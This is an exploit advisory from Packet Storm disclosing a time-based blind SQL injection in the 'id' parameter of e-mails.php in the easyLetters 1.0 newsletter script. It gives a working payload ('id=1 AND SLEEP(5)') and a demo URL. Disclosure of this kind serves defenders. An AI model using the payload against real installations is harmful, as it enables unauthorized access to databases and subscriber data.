easyLetters 1.0 SQL Injection

2018-05-26T00:00:00
ID PACKETSTORM:147898
Type packetstorm
Reporter Ozkan Mustafa Akkus
Modified 2018-05-26T00:00:00

Description

                                        
                                            `# Exploit Title: easyLetters 1.0 - 'id' SQL Injection  
# Dork: N/A  
# Date: 25.05.2018  
# Exploit Author: Azkan Mustafa AkkuA (AkkuS)  
# Vendor Homepage: https://codecanyon.net/item/easyletters/5281396  
# Version: 1.0  
# Category: Webapps  
# Tested on: Kali linux  
====================================================  
# Demo : http://pauloreg.com/newsletter/  
# PoC : SQLi :  
  
http://test.com/newsletter/e-mails.php?id=[SQLi]  
  
Parameter: id (GET)  
  
Type: AND/OR time-based blind  
Title: MySQL >= 5.0.12 AND time-based blind  
Payload: id=1 AND SLEEP(5)  
  
====================================================  
  
`